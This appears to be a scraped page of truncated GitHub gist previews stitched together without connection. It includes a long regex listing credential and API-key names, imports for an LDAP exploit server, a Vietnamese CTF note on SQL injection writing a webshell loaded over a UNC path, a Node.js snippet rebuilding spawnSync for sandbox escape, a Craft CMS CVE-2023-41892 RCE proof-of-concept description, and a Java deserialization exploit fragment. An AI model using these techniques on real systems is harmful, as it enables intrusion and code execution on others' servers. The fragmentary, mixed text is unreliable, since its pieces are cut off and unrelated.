| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
| import com.unboundid.ldap.listener.InMemoryDirectoryServer; | |
| import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; | |
| import com.unboundid.ldap.listener.InMemoryListenerConfig; | |
| import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; | |
| import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; | |
| import com.unboundid.ldap.sdk.Entry; | |
| import com.unboundid.ldap.sdk.LDAPException; | |
| import com.unboundid.ldap.sdk.LDAPResult; | |
| import com.unboundid.ldap.sdk.ResultCode; | |
| import org.apache.naming.ResourceRef; |
| import socket | |
| import os | |
| # Define the server address and port | |
| HOST = '0.0.0.0' | |
| PORT = 2121 | |
| DATA_PORT = 61343 # Port for data transfer | |
| # Function to handle USER command | |
| def handle_user(client_socket): |
Intended: sqli write webshell kết hợp với mysql trick (dùng @ trong đường dẫn để chỉ định port -> WebDAV via HTTP) access tới webshell thông qua unc path (load_file('\\\\localhost:8080/shell.php'))
Một vài note
When a UNC path is navigated to, the protocol used depends on your provider order. The default Windows configuration will attempt SMB, and then if unavailable, will then attempt WebDAV. Here is the result of running:
net use \\173.xxx.xxx.xxx\sdfsdfsdf
| // Source: https://github.com/nodejs/node/blob/master/lib/child_process.js | |
| // Defines spawn_sync and normalizeSpawnArguments (without error handling). These are internal variables. | |
| spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};} | |
| // Defines spawnSync, the function that will do the actual spawning | |
| spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]) |
This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).
CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.
This POC is depending on writing webshell, so finding a suitable folder with writable permission is necessary.
| POST / HTTP/1.1 | |
| Host: ec2-23-20-227-204.compute-1.amazonaws.com:3000 | |
| Connection: keep-alive | |
| Content-Length: 871 | |
| Cache-Control: max-age=0 | |
| Origin: http://ec2-23-20-227-204.compute-1.amazonaws.com:3000 | |
| User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5 | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUzEOlJ3ebRFRAGwv | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Referer: http://ec2-23-20-227-204.compute-1.amazonaws.com:3000/ |
finalize() method (called by garbage collector latter) to exploit java native deserialization (read more here)liferay-ce-portal-7.0-ga3)POC:
import com.sun.media.jai.rmi.ColorModelState;
import com.sun.media.jai.rmi.SampleModelState;
import javassist.ClassPool;
Let's consider a JDK8 installation using 2 different versions: default and Oracle. The default version is easiest because it is packaged with Ubuntu.
There is default Java installation called the JDK (Java Development Kit). The JDK is usually only needed if you are going to to do some software developmwent using Java or if some software requires it. The JDK does contain the JRE.